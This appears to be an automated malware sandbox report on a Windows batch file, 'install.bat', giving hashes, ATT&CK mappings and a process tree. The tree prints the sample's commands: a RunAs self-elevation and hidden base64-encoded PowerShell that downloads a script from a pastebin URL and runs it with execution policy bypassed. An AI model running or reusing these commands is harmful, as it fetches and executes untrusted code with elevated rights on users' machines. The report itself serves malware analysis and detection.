c8cebb25512027ad70b61a647887fa4013489d2dc4294fce853b8363410c423d

General

Target

install.bat
Size

595B
MD5

369f9a8a381c74880783423b98ed52c9
SHA1

3bd04c343b1c361d4e9383010cb0be2380c3dbdb
SHA256

c8cebb25512027ad70b61a647887fa4013489d2dc4294fce853b8363410c423d
SHA512

a139d4d0a7d3f0f6a28690df219cb14adf6a4f0a7ff365bb1e8142ddf8be136ea919e44e4f3108d8fcf344031bff127c701d91b2949501e83d26fdbd6b746c7b

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2564	powershell.exe
2528	powershell.exe
2572	powershell.exe
2760	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2760	powershell.exe
2760	powershell.exe
2760	powershell.exe
2564	powershell.exe
2528	powershell.exe
2572	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	2572	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1900 wrote to memory of 2760	1900	cmd.exe	31
PID 1900 wrote to memory of 2760	1900	cmd.exe	31
PID 1900 wrote to memory of 2760	1900	cmd.exe	31
PID 2760 wrote to memory of 2780	2760	powershell.exe	32
PID 2760 wrote to memory of 2780	2760	powershell.exe	32
PID 2760 wrote to memory of 2780	2760	powershell.exe	32
PID 2780 wrote to memory of 2564	2780	cmd.exe	34
PID 2780 wrote to memory of 2564	2780	cmd.exe	34
PID 2780 wrote to memory of 2564	2780	cmd.exe	34
PID 2780 wrote to memory of 2528	2780	cmd.exe	35
PID 2780 wrote to memory of 2528	2780	cmd.exe	35
PID 2780 wrote to memory of 2528	2780	cmd.exe	35
PID 2528 wrote to memory of 2572	2528	powershell.exe	36
PID 2528 wrote to memory of 2572	2528	powershell.exe	36
PID 2528 wrote to memory of 2572	2528	powershell.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\install.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\install.bat' -ArgumentList 'am_admin'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8ASwBZAGQAUgByAFQAUwB4ACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgB0AGUAbQBwAFwAQQBtAC4AcABzADEA
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoAdABlAG0AcABcAEEAbQAuAHAAcwAxAA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\Am.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PU38OC3IGMDKNMD481GH.temp

Filesize
7KB

MD5
5485102e3e39fe7d75235163d3c97769

SHA1
40b20b27a0b77c0fe2896311d757beb7e98fb066

SHA256
a63a3919a5e426bfb862c5c22f9fca60d4fe00d9322898aa12b7454c98365f11

SHA512
1d79d65bf01319a70b21feec93a55e0b75efd88958e495c0469721f03a19840023476c297fbca291cab045607211d76176527f35f32a8695bb6398e14c1e55ab

Download Submit
memory/2528-23-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2528-24-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2760-4-0x000007FEF429E000-0x000007FEF429F000-memory.dmp

Filesize
4KB

Download
memory/2760-5-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

Filesize
2.9MB

Download
memory/2760-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2760-7-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-8-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-10-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-11-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-9-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-13-0x000007FEF3FE0000-0x000007FEF497D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing